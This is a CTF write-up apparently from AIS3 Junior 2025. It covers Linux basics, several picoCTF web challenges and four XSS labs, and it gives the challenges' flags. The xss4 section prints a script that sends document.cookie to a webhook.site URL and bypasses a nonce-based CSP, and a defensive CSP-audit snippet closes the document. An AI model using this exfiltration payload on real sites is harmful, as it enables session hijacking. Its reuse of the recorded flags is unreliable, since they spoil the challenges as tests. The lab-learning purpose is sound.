# AIS3 Junior2025 Frontend Write-up

## Linux

### challenge-1

![image](https://hackmd.io/_uploads/BkgoglIueg.png)

step 1. Run `ls` to see the output
step 2. Enter `challenge-1`
step 3. Run `ls` again and find the flag
step 4. `cat flag`

Flag: `AIS3{C0N9_Y0UR_F1R57_F1A9_😼}`

### challenge-2

![image](https://hackmd.io/_uploads/ByZJGlIdee.png)

step 1. `cd challenge-2`
step 2. `ls` (nothing listed)
step 3. `ls -a` (look for hidden files)
step 4. `cat .flag`

Flag: `AIS3{15_a1_W0N7_M155_D07_🚩}`

### challenge-3

![Screenshot 2025-08-10 163224](https://hackmd.io/_uploads/BkvRNgIOeg.png)

Following the hint, just `touch` in `/tmp`.

### challenge-4

![Screenshot 2025-08-10 163633](https://hackmd.io/_uploads/B1TBrx8deg.png)

Following the hint, just `mv` `grep` to challenge-5.

### challenge-5

![Screenshot 2025-08-10 170103](https://hackmd.io/_uploads/BJa3SxUdel.png)
![Screenshot 2025-08-10 170129](https://hackmd.io/_uploads/H1anreUugl.png)
![Screenshot 2025-08-10 170240](https://hackmd.io/_uploads/r1p2Se8dgl.png)

Use `find` to dig it out.

### challenge-6

![Screenshot 2025-08-10 182836](https://hackmd.io/_uploads/HypyUe8_le.png)
![Screenshot 2025-08-10 182821](https://hackmd.io/_uploads/r1T1IgIOeg.png)

As the challenge says, `rm flag` and you get the flag.

---

## picoctf(WEB)

### GET aHEAD

Description

Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:34561/

![Screenshot 2025-08-10 184342](https://hackmd.io/_uploads/B1SrugIOlg.png)

Change GET to HEAD and the flag comes out.

Flag: `picoCTF{r3j3ct_th3_du4l1ty_8f878508}`

### Cookies

Description

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:27177/

![Screenshot 2025-08-10 184803](https://hackmd.io/_uploads/rkhuFeUOeg.png)
![Screenshot 2025-08-10 184813](https://hackmd.io/_uploads/H13dYxI_el.png)
![Screenshot 2025-08-10 184818](https://hackmd.io/_uploads/r1n_FeU_xx.png)
![Screenshot 2025-08-10 184827](https://hackmd.io/_uploads/rynuYxIuex.png)
![Screenshot 2025-08-10 184958](https://hackmd.io/_uploads/BJndYlLOlx.png)

Different cookie values map to different cookies. Testing up to 18 gives the flag.

Flag: `picoCTF{3v3ry1_l0v3s_c00k135_064663be}`

### Inspect HTML

Description

Can you get the flag?
Additional details will be available after launching your challenge instance.

![image](https://hackmd.io/_uploads/rksvqx8dxl.png)

In a word: easy!!!!

Flag: `picoCTF{1n5p3t0r_0f_h7ml_1fd8425b}`

### Bookmarklet

Description

Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag!

![Screenshot 2025-08-10 185759](https://hackmd.io/_uploads/S1cbnxLOel.png)

Run the code the page provides in the console:

```
javascript:(function() {
    var encryptedFlag = "àÒÆÞ¦È¬ëÙ£Ö�ÓÚåÛÑ¢ÕÓ�ÒËɧ�©�í";
    var key = "picoctf";
    var decryptedFlag = "";
    for (var i = 0; i < encryptedFlag.length; i++) {
        decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256);
    }
    alert(decryptedFlag);
})()
```

Flag: `picoCTF{p@g3_turn3r_6bbf8953}`

### WebDecode

Description

Do you know how to use the web inspector? Additional details will be available after launching your challenge instance.

![image](https://hackmd.io/_uploads/rkY3peLdge.png)

In Burp Suite, look at the source of the about page. One line looks encoded:

cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMWY4MzI2MTV9

Base64-decoding it gives the flag.

Flag: `picoCTF{web_succ3ssfully_d3c0ded_1f832615}`

---

## XSS

### xss1

url: https://chall.nckuctf.org:28124/

![image](https://hackmd.io/_uploads/B1e_rkv_gl.png)

First, test with a script.

![image](https://hackmd.io/_uploads/rkkKBkDulg.png)

The alert fires, which means the XSS vulnerability exists.

![image](https://hackmd.io/_uploads/SkyiS1P_gl.png)

Open a webhook.

![image](https://hackmd.io/_uploads/ByQ-IJP_el.png)

Insert a fetch.

![image](https://hackmd.io/_uploads/H1jSLyvdxg.png)

The webhook receives data.

![image](https://hackmd.io/_uploads/BJFO8kvdxl.png)

https does not work.

![image](https://hackmd.io/_uploads/H1ecL1vulx.png)

Switch to http.

![image](https://hackmd.io/_uploads/HJZjLJPOxx.png)

The webhook received the cookie!

### xss2

url: https://chall.nckuctf.org:28125/

![image](https://hackmd.io/_uploads/SyvZ2JPuxl.png)

Same technique.

![image](https://hackmd.io/_uploads/SJGj2JP_el.png)

Looking at the source code, there is an extra `<script>`.

![image](https://hackmd.io/_uploads/Byz_pyPuge.png)

Use `</script>` to close the extra `<script>`.

![image](https://hackmd.io/_uploads/r1PKTkw_ex.png)

Success (the rest is the same as xss-1).

![image](https://hackmd.io/_uploads/BkBfC1Pull.png)
![image](https://hackmd.io/_uploads/HJy4C1Puxg.png)
![image](https://hackmd.io/_uploads/HJE8mxvOgl.png)
![image](https://hackmd.io/_uploads/r1UP7xDule.png)

Tasty cookie.

### xss3

Use a pseudo-protocol.

![image](https://hackmd.io/_uploads/Syddb8vulx.png)

The alert works.

![image](https://hackmd.io/_uploads/SJknWUDOxl.png)
![image](https://hackmd.io/_uploads/rkQAZUDdxl.png)
![image](https://hackmd.io/_uploads/rJ72HLw_xe.png)

Clicking it sends the data to the webhook.

![image](https://hackmd.io/_uploads/Hk-mMLDuel.png)
![image](https://hackmd.io/_uploads/r19wfLvOel.png)
![image](https://hackmd.io/_uploads/SyKSGUwOxl.png)

cookie!!!!!

### xss4

![image](https://hackmd.io/_uploads/BkDfuIwdgg.png)

Submit something first to see what happens.

![image](https://hackmd.io/_uploads/S15SdIw_gx.png)

Try sending a CSP test?

![image](https://hackmd.io/_uploads/H1BjuIPOxx.png)

Got it! `script-src 'nonce-MjcyNjg5'`

Modify the instructor's template:

```
document.addEventListener("DOMContentLoaded", function () {
    // Send document.cookie to the webhook as a query parameter
    fetch(`https://webhook.site/d00ad947-5225-4239-b3cb-e32dabdf4185?a=${document.cookie}`);
    const button = document.getElementById("showTimeButton");
    button.addEventListener("click", function () {
        displayCurrentTime();
    });
    function displayCurrentTime() {
        const now = new Date();
        const timeString = now.toLocaleTimeString();
        document.getElementById("timeDisplay").innerText = "現在時間: " + timeString;
    }
});
```

Send it through the py machine and there it is: `NCKUCTF{b453-url_w1ll_n07_f4llb4ck_70_d3f4ul7-5rc}`
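
The xss4 flag names the policy gap: `base-uri` does not fall back to `default-src`, so a nonce-based `script-src` alone leaves the document base URL unpinned. The policy check below is an added example, not part of the original write-up; `auditCsp` and the finding labels are hypothetical names, and the sample policies are constructed around the `script-src` value captured above.

```javascript
// Added example, not from the original write-up. auditCsp and the finding
// labels are hypothetical names; SAMPLES are constructed policies.

// Directives that never inherit from default-src (CSP Level 3).
const NO_FALLBACK = ["base-uri", "form-action", "frame-ancestors"];

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (!name) continue;
    const key = name.toLowerCase();
    // Browsers ignore a repeated directive: the first occurrence wins.
    if (!policy.has(key)) policy.set(key, values);
  }
  return policy;
}

function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = NO_FALLBACK.filter((d) => !policy.has(d)).map((d) => `missing:${d}`);

  const scriptSrc = policy.get("script-src") || policy.get("default-src") || [];
  const usesNonce = scriptSrc.some((v) => /^'nonce-[A-Za-z0-9+/_-]+=*'$/.test(v));
  // base-uri counts as locked only when every source is 'none' or 'self'
  // (an empty source list behaves like 'none').
  const baseUri = policy.get("base-uri");
  const baseLocked = baseUri !== undefined &&
    baseUri.every((v) => ["'none'", "'self'"].includes(v.toLowerCase()));
  // A nonce approves the <script> element, not the URL it loads, so the
  // document base URL must be pinned for relative script paths to stay put.
  if (usesNonce && !baseLocked) findings.push("nonce-script-with-open-base-uri");
  return findings;
}

const SAMPLES = [
  "script-src 'nonce-MjcyNjg5'",                       // value seen in xss4
  "default-src 'none'; script-src 'nonce-MjcyNjg5'",   // default-src does not help
  "default-src 'self'; script-src 'nonce-MjcyNjg5'; base-uri 'none'; " +
    "form-action 'self'; frame-ancestors 'none'",      // hardened
];
for (const p of SAMPLES) console.log(p, "=>", auditCsp(p));
```

Only the third sample returns an empty findings list; adding `default-src 'none'` in the second changes nothing for `base-uri`.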